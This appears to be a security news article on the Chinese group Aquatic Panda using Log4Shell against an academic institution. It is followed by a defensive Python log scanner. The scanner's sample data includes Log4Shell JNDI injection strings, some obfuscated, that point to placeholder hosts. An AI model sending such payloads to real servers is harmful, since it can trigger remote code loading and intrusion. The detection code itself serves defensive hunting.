Chinese Attackers Utilize Log4Shell in Post-Exploitation Attacks

According to cybersecurity firm CrowdStrike, Chinese hackers are using Log4Shell exploit tooling to carry out a range of post-exploitation operations. Aquatic Panda, the group behind these malicious operations, was observed exploiting the Log4Shell vulnerability against a large academic institution.

Aquatic Panda

Aquatic Panda is a Chinese hacking group that has been active since May 2020 and has two primary objectives:

  1. Intelligence collection 
  2. Industrial espionage

This hacking group primarily targets organizations in the following sectors:

  • Government
  • Technology
  • Telecommunications

Technical Analysis

Aquatic Panda uses a modified version of a public Log4j exploit to gain initial access to the target system, and then carries out several post-exploitation activities, such as:

  • Credential collection
  • Exploration (reconnaissance of the compromised host)

The hackers targeted a VMware Horizon instance, which used the vulnerable Log4j library, to infiltrate a large academic institution. The exploit code used in the attack had been released on GitHub on December 13, 2021. As a connection check, the threat actors performed DNS lookups for a subdomain under the Apache Tomcat service running on the VMware Horizon instance.

Using PowerShell commands and additional scripts, the hackers retrieved the malware and three VBS files. At this point, the Aquatic Panda threat actors made several attempts to collect credentials by dumping process memory and preparing the dumps for exfiltration.
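The initial-access step described above leaves a recognisable trace: a `${jndi:...}` lookup string in whatever request field the vulnerable application logged through Log4j (often the User-Agent header). The following is an added defensive example, not code from the article or from CrowdStrike. It scans constructed web-server access-log lines for JNDI lookups, and first collapses the nested-lookup obfuscation (`${lower:j}`, `${::-j}`, `${env:NAME:-j}`) that attackers commonly use to evade naive string matching. The log lines, IP addresses, and `example.invalid` hosts are all constructed sample data; the resolution rules cover the common idioms only and are an assumption about what a hunt should handle, not an exhaustive decoder.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not real traffic from the incident).
# Line 1 is benign; lines 2-5 carry a JNDI lookup, three of them obfuscated.
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 100 "-" "${jndi:ldap://example.invalid:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 100 "-" "${${lower:j}${lower:n}di:ldap://example.invalid/x}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 100 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://example.invalid/y}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 100 "-" "${${env:NaN:-j}ndi:dns://example.invalid/z}"',
]

# An innermost lookup: "${...}" whose body contains no further "${".
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A complete JNDI lookup with its scheme (ldap, ldaps, rmi, dns, ...).
_JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):[^}]*\}", re.IGNORECASE)


def _resolve_inner(body: str) -> str:
    """Return the literal an attacker intends an inner lookup to evaluate to.

    Covered idioms (assumption: the common ones seen in the wild):
      ${lower:X} / ${upper:X}        -> X, case-folded
      ${::-X} and ${prefix:NAME:-X}  -> X, the default value after ':-'
    Any other lookup is dropped (resolves to the empty string).
    """
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() == "lower":
        return rest.lower()
    if sep and prefix.lower() == "upper":
        return rest.upper()
    return ""


def normalize(value: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out, leaving ${jndi:...} intact.

    Each round replaces every innermost non-JNDI lookup with its literal, so
    "${${lower:j}ndi:ldap://h/x}" becomes "${jndi:ldap://h/x}". max_rounds
    bounds the work on pathological input.
    """
    def _sub(m: "re.Match[str]") -> str:
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            return m.group(0)  # keep the payload itself for the detector
        return _resolve_inner(body)

    for _ in range(max_rounds):
        new = _INNER_LOOKUP.sub(_sub, value)
        if new == value:
            break
        value = new
    return value


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per log line that carries a (possibly obfuscated) JNDI lookup."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        norm = normalize(line)
        match = _JNDI.search(norm)
        if match:
            hits.append({
                "line": number,
                "scheme": match.group(1).lower(),
                "lookup": match.group(0),        # de-obfuscated payload
                "obfuscated": norm != line,      # True if nesting had to be collapsed
            })
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        flag = "obfuscated" if hit["obfuscated"] else "plain"
        print(f"line {hit['line']}: {hit['scheme']} ({flag}) {hit['lookup']}")
```

Run against real logs, a hit on an internet-facing Horizon or Tomcat host is a strong reason to pull that host's outbound DNS and LDAP/RMI connection records for the same time window, since a successful exploit is followed by exactly the kind of outbound lookup the article describes; hits that decode to a scheme other than `ldap`, `ldaps`, `rmi` or `dns` are still worth triage, because the scheme list above is only a convention, not a filter.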

The targeted academic institution was notified of the suspicious activity, allowing it to invoke its incident response process, patch the vulnerable software quickly, and stop the malicious activity from spreading further.
